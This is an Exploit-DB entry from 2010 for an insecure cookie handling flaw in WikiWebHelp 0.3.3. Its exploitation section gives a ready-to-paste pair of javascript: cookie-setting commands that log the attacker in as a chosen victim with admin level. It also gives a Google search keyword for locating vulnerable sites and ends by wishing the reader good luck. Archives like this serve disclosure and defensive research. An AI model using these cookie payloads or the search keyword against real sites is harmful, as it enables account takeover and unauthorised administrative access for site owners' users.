WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability

2010-10-17T00:00:00
ID EDB-ID:15268
Type exploitdb
Reporter FuRty
Modified 2010-10-17T00:00:00

Description

WikiWebHelp <= 0.3.3 Insecure Cookie Handling Vulnerability. Webapps exploit for php platform

                                        
                                            ===============================================
WikiWebHelp v0.3.3 &lt;= Insecure Cookie Handling
===============================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : FuRty
[~] Contact : fir4t@fir4t.org
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : WikiWebHelp
~Version : 0.3.3
~Software: http://sourceforge.net/projects/wwh/
~Vendor : http://wikiwebhelp.org
~Vulnerability Style : Cookie Handling
~Google Keyword : Powered by WikiWebHelp
[~]Date : "17.10.2010"
-----------
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

        ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    Browser Injection for handling() by Javascript-SQLi Codes
    ================================
    Do not rush to primarily target the site, please register:)

    javascript:document.cookie="loggedon=[VictimNICK];path=/"; javascript:document.cookie="level=admin;path=/";
    ================================
          [+]  Cookie Browser Injected!
 
          [+]  Logged on 
          
          
          
     Ýyi þanslar :C / GoodLuck